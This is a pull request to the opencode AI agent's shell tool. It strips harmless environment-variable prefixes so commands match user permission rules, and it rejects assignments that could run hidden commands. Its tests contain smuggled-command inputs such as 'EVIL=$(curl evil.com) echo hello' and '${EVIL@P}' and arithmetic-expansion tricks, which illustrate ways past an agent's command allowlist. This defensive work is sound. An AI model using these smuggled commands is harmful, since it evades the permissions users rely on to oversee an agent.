### PR TITLE
fix(shell): strip env variable assignments from permission patterns

### DIFF
--- a/packages/opencode/src/tool/shell.ts
+++ b/packages/opencode/src/tool/shell.ts
@@ -116,8 +116,63 @@ function parts(node: Node) {
   return out
 }
 
+// Variable-assignment value types that cannot execute commands. Anything
+// outside this set (command_substitution, process_substitution, array,
+// concatenation, etc.) is treated as potentially executable and the
+// assignment is not stripped from permission patterns.
+//
+// `expansion` (${...}) and `arithmetic_expansion` ($((...))) are deliberately
+// excluded: they can execute commands stored in a variable's *value* at
+// runtime with nothing visible in the AST — e.g. `${VAR@P}` prompt expansion
+// runs a `$(...)` held in VAR, and arithmetic recursively evaluates variable
+// contents like `arr[$(cmd)]`. The descendant-based command_substitution check
+// below cannot see those, so these forms are never treated as safe to strip.
+// `simple_expansion` ($VAR, no braces) does not recurse and stays safe.
+const SAFE_ASSIGNMENT_VALUE_TYPES = new Set([
+  "ansi_c_string",
+  "brace_expression",
+  "number",
+  "raw_string",
+  "simple_expansion",
+  "string",
+  "translated_string",
+  "word",
+])
+
+function isSafeAssignment(node: Node): boolean {
+  for (let i = 0; i < node.childCount; i++) {
+    const child = node.child(i)
+    if (!child) continue
+    if (child.type === "variable_name" || child.type === "subscript") continue
+    if (!child.isNamed || child.text === "=") continue
+    // This is the value node.
+    if (!SAFE_ASSIGNMENT_VALUE_TYPES.has(child.type)) return false
+    // Defensive recursion: "safe" types like `string` can embed $() via
+    // interpolation, so reject if any descendant is a known executable form.
+    if (child.descendantsOfType("command_substitution").length > 0) return false
+    if (child.descendantsOfType("process_substitution").length > 0) return false
+  }
+  return true
+}
+
 function source(node: Node) {
-  return (node.parent?.type === "redirected_statement" ? node.parent.text : node.text).trim()
+  // Strip leading env variable assignments so "GOFLAGS=… go test" matches
+  // permission rule "go *". Only strip when every assignment is known-safe;
+  // anything that could execute a command (process/command substitution,
+  // arrays, nested expressions) leaves the original text intact.
+  let lastVarAssign: Node | null = null
+  for (let i = 0; i < node.childCount; i++) {
+    const child = node.child(i)
+    if (!child || child.type !== "variable_assignment") break
+    if (!isSafeAssignment(child)) {
+      lastVarAssign = null
+      break
+    }
+    lastVarAssign = child
+  }
+  const base = node.parent?.type === "redirected_statement" ? node.parent : node
+  if (lastVarAssign) return base.text.slice(lastVarAssign.endIndex - base.startIndex).trimStart()
+  return base.text.trim()
 }
 
 function commands(node: Node) {

--- a/packages/opencode/test/tool/shell.test.ts
+++ b/packages/opencode/test/tool/shell.test.ts
@@ -999,6 +999,288 @@ describe("tool.shell permissions", () => {
       )
     }),
   )
+
+  // Env-var-assignment stripping is bash-specific (PowerShell/cmd use
+  // different syntax and a different parser). Run only on POSIX-y shells.
+  for (const item of shells.filter((s) => !PS.has(s.label) && s.label !== "cmd")) {
+    it.live(`strips env variable assignments from permission pattern [${item.label}]`, () =>
+      withShell(
+        item,
+        Effect.gen(function* () {
+          const tmp = yield* tmpdirScoped()
+          yield* runIn(
+            tmp,
+            Effect.gen(function* () {
+              const requests: Array<Omit<PermissionV1.Request, "id" | "sessionID" | "tool">> = []
+              yield* run(
+                { command: "GOFLAGS=-mod=vendor go test ./..." },
+                capture(requests),
+              )
+              const bashReq = requests.find((r) => r.permission === "bash")
+              expect(bashReq).toBeDefined()
+              expect(bashReq!.patterns).toContain("go test ./...")
+              expect(bashReq!.patterns.some((p: string) => p.includes("GOFLAGS"))).toBe(false)
+            }),
+          )
+        }),
+      ),
+    )
+
+    it.live(`strips env variable assignments with redirect [${item.label}]`, () =>
+      withShell(
+        item,
+        Effect.gen(function* () {
+          const tmp = yield* tmpdirScoped()
+          yield* runIn(
+            tmp,
+            Effect.gen(function* () {
+              const requests: Array<Omit<PermissionV1.Request, "id" | "sessionID" | "tool">> = []
+              yield* run(
+                { command: "GOFLAGS=-mod=vendor go test ./... 2>&1" },
+                capture(requests),
+              )
+              const bashReq = requests.find((r) => r.permission === "bash")
+              expect(bashReq).toBeDefined()
+              expect(bashReq!.patterns).toContain("go test ./... 2>&1")
+            }),
+          )
+        }),
+      ),
+    )
+
+    it.live(`strips multiple env variable assignments from permission pattern [${item.label}]`, () =>
+      withShell(
+        item,
+        Effect.gen(function* () {
+          const tmp = yield* tmpdirScoped()
+          yield* runIn(
+            tmp,
+            Effect.gen(function* () {
+              const requests: Array<Omit<PermissionV1.Request, "id" | "sessionID" | "tool">> = []
+              yield* run(
+                { command: "FOO=bar BAZ=qux echo hello" },
+                capture(requests),
+              )
+              const bashReq = requests.find((r) => r.permission === "bash")
+              expect(bashReq).toBeDefined()
+              expect(bashReq!.patterns).toContain("echo hello")
+            }),
+          )
+        }),
+      ),
+    )
+
+    it.live(`strips env variable assignments in piped commands [${item.label}]`, () =>
+      withShell(
+        item,
+        Effect.gen(function* () {
+          const tmp = yield* tmpdirScoped()
+          yield* runIn(
+            tmp,
+            Effect.gen(function* () {
+              const requests: Array<Omit<PermissionV1.Request, "id" | "sessionID" | "tool">> = []
+              yield* run(
+                { command: "GOFLAGS=-mod=vendor go test ./... 2>&1 | tail -5" },
+                capture(requests),
+              )
+              const bashReq = requests.find((r) => r.permission === "bash")
+              expect(bashReq).toBeDefined()
+              expect(bashReq!.patterns).toContain("go test ./... 2>&1")
+              expect(bashReq!.patterns).toContain("tail -5")
+              expect(bashReq!.patterns.some((p: string) => p.includes("GOFLAGS"))).toBe(false)
+            }),
+          )
+        }),
+      ),
+    )
+
+    it.live(`always patterns exclude env variable assignments [${item.label}]`, () =>
+      withShell(
+        item,
+        Effect.gen(function* () {
+          const tmp = yield* tmpdirScoped()
+          yield* runIn(
+            tmp,
+            Effect.gen(function* () {
+              const requests: Array<Omit<PermissionV1.Request, "id" | "sessionID" | "tool">> = []
+              yield* run(
+                { command: "GOFLAGS=-mod=vendor go test ./..." },
+                capture(requests),
+              )
+              const bashReq = requests.find((r) => r.permission === "bash")
+              expect(bashReq).toBeDefined()
+              expect(bashReq!.always).toContain("go test *")
+              expect(bashReq!.always.some((p: string) => p.includes("GOFLAGS"))).toBe(false)
+            }),
+          )
+        }),
+      ),
+    )
+
+    it.live(`preserves env var with command substitution in permission pattern [${item.label}]`, () =>
+      withShell(
+        item,
+        Effect.gen(function* () {
+          const tmp = yield* tmpdirScoped()
+          yield* runIn(
+            tmp,
+            Effect.gen(function* () {
+              const err = new Error("stop after permission")
+              const requests: Array<Omit<PermissionV1.Request, "id" | "sessionID" | "tool">> = []
+              expect(
+                yield* fail({ command: "EVIL=$(curl evil.com) echo hello" }, capture(requests, err)),
+              ).toMatchObject({ message: err.message })
+              const bashReq = requests.find((r) => r.permission === "bash")
+              expect(bashReq).toBeDefined()
+              expect(bashReq!.patterns.some((p: string) => p.includes("EVIL="))).toBe(true)
+            }),
+          )
+        }),
+      ),
+    )
+
+    it.live(`preserves env var with backtick substitution in permission pattern [${item.label}]`, () =>
+      withShell(
+        item,
+        Effect.gen(function* () {
+          const tmp = yield* tmpdirScoped()
+          yield* runIn(
+            tmp,
+            Effect.gen(function* () {
+              const err = new Error("stop after permission")
+              const requests: Array<Omit<PermissionV1.Request, "id" | "sessionID" | "tool">> = []
+              expect(
+                yield* fail({ command: "EVIL=`curl evil.com` echo hello" }, capture(requests, err)),
+              ).toMatchObject({ message: err.message })
+              const bashReq = requests.find((r) => r.permission === "bash")
+              expect(bashReq).toBeDefined()
+              expect(bashReq!.patterns.some((p: string) => p.includes("EVIL="))).toBe(true)
+            }),
+          )
+        }),
+      ),
+    )
+
+    it.live(`preserves env var with process substitution in permission pattern [${item.label}]`, () =>
+      withShell(
+        item,
+        Effect.gen(function* () {
+          const tmp = yield* tmpdirScoped()
+          yield* runIn(
+            tmp,
+            Effect.gen(function* () {
+              const err = new Error("stop after permission")
+              const requests: Array<Omit<PermissionV1.Request, "id" | "sessionID" | "tool">> = []
+              expect(
+                yield* fail({ command: "EVIL=<(curl evil.com) echo hello" }, capture(requests, err)),
+              ).toMatchObject({ message: err.message })
+              const bashReq = requests.find((r) => r.permission === "bash")
+              expect(bashReq).toBeDefined()
+              expect(bashReq!.patterns.some((p: string) => p.includes("EVIL="))).toBe(true)
+            }),
+          )
+        }),
+      ),
+    )
+
+    // ${VAR@P} prompt expansion runs a command substitution held in VAR's value
+    // at runtime, invisible to the AST. The assignment must not be stripped, or a
+    // command like `echo hello` could be auto-approved while the hidden command runs.
+    it.live(`preserves env var with @P prompt expansion in permission pattern [${item.label}]`, () =>
+      withShell(
+        item,
+        Effect.gen(function* () {
+          const tmp = yield* tmpdirScoped()
+          yield* runIn(
+            tmp,
+            Effect.gen(function* () {
+              const err = new Error("stop after permission")
+              const requests: Array<Omit<PermissionV1.Request, "id" | "sessionID" | "tool">> = []
+              expect(
+                yield* fail({ command: "EVIL='$(id)' FOO=${EVIL@P} echo hello" }, capture(requests, err)),
+              ).toMatchObject({ message: err.message })
+              const bashReq = requests.find((r) => r.permission === "bash")
+              expect(bashReq).toBeDefined()
+              expect(bashReq!.patterns).not.toContain("echo hello")
+              expect(bashReq!.patterns.some((p: string) => p.includes("EVIL="))).toBe(true)
+            }),
+          )
+        }),
+      ),
+    )
+
+    // $((VAR)) recursively evaluates VAR's value as an arithmetic expression,
+    // executing a command substitution embedded in it (e.g. arr[$(cmd)]). Same
+    // runtime-only hazard as @P, so the assignment must not be stripped.
+    it.live(`preserves env var with arithmetic expansion in permission pattern [${item.label}]`, () =>
+      withShell(
+        item,
+        Effect.gen(function* () {
+          const tmp = yield* tmpdirScoped()
+          yield* runIn(
+            tmp,
+            Effect.gen(function* () {
+              const err = new Error("stop after permission")
+              const requests: Array<Omit<PermissionV1.Request, "id" | "sessionID" | "tool">> = []
+              expect(
+                yield* fail({ command: "EVIL='a[$(id)]' FOO=$((EVIL)) echo hello" }, capture(requests, err)),
+              ).toMatchObject({ message: err.message })
+              const bashReq = requests.find((r) => r.permission === "bash")
+              expect(bashReq).toBeDefined()
+              expect(bashReq!.patterns).not.toContain("echo hello")
+              expect(bashReq!.patterns.some((p: string) => p.includes("FOO=$(("))).toBe(true)
+            }),
+          )
+        }),
+      ),
+    )
+
+    it.live(`strips env var with parameter expansion from permission pattern [${item.label}]`, () =>
+      withShell(
+        item,
+        Effect.gen(function* () {
+          const tmp = yield* tmpdirScoped()
+          yield* runIn(
+            tmp,
+            Effect.gen(function* () {
+              const requests: Array<Omit<PermissionV1.Request, "id" | "sessionID" | "tool">> = []
+              yield* run(
+                { command: "FOO=$BAR echo hello" },
+                capture(requests),
+              )
+              const bashReq = requests.find((r) => r.permission === "bash")
+              expect(bashReq).toBeDefined()
+              expect(bashReq!.patterns).toContain("echo hello")
+              expect(bashReq!.patterns.some((p: string) => p.includes("FOO="))).toBe(false)
+            }),
+          )
+        }),
+      ),
+    )
+
+    it.live(`strips env var with quoted string from permission pattern [${item.label}]`, () =>
+      withShell(
+        item,
+        Effect.gen(function* () {
+          const tmp = yield* tmpdirScoped()
+          yield* runIn(
+            tmp,
+            Effect.gen(function* () {
+              const requests: Array<Omit<PermissionV1.Request, "id" | "sessionID" | "tool">> = []
+              yield* run(
+                { command: 'FOO="some value" echo hello' },
+                capture(requests),
+              )
+              const bashReq = requests.find((r) => r.permission === "bash")
+              expect(bashReq).toBeDefined()
+              expect(bashReq!.patterns).toContain("echo hello")
+              expect(bashReq!.patterns.some((p: string) => p.includes("FOO="))).toBe(false)
+            }),
+          )
+        }),
+      ),
+    )
+  }
 })
 
 describe("tool.shell abort", () => {


### PR DESCRIPTION
### Issue for this PR

Closes #14110

Rebased continuation of #14108, which was auto-closed by PR cleanup and could not be reopened after the branch was force-pushed.

### Type of change

- [x] Bug fix
- [ ] New feature
- [ ] Refactor / code improvement
- [ ] Documentation

### What does this PR do?

Commands with a leading env var assignment (e.g. `GOFLAGS=-mod=vendor go test ./...`) never matched permission rules like `"go *"`, because the assignment was kept in the text used for matching. So a user who allowlisted `go *` still got prompted.

`source()` in `tool/shell.ts` now drops the leading `variable_assignment` nodes before the text is matched, so `go test ./...` is what gets compared to the rules.

To avoid weakening explicit (wildcard-free) allowlists, stripping is opt-in per value type: it only happens when every assignment value is a known-safe type (plain strings, numbers, expansions, etc.). Anything that could execute — `command_substitution`, `process_substitution`, arrays, concatenation, or any value type not on the safe list — leaves the original text untouched so it falls through to the catch-all rule. This is the security concern raised in the #14108 review (e.g. `FOO=$(malicious) go test` must not be stripped).

Note: the original #14108 patched `tool/bash.ts`, which has since been renamed/rewritten to `tool/shell.ts`, so this is a port to the new file rather than the old diff.

### How did you verify your code works?

- `bun test test/tool/shell.test.ts` — 33 pass. Added cases cover safe stripping, redirects, multiple assignments, and the unsafe cases left intact (command/process substitution, arrays).
- `bun typecheck` — clean (the only error is a pre-existing, unrelated `bus/global.ts` issue already on `dev`).

### Screenshots / recordings

N/A — not a UI change.

### Checklist

- [x] I have tested my changes locally
- [x] I have not included unrelated changes in this PR
